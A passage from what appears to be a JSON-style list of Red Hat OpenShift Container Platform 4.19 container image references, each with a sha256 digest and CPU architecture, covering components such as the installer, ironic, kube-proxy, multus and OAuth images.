"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
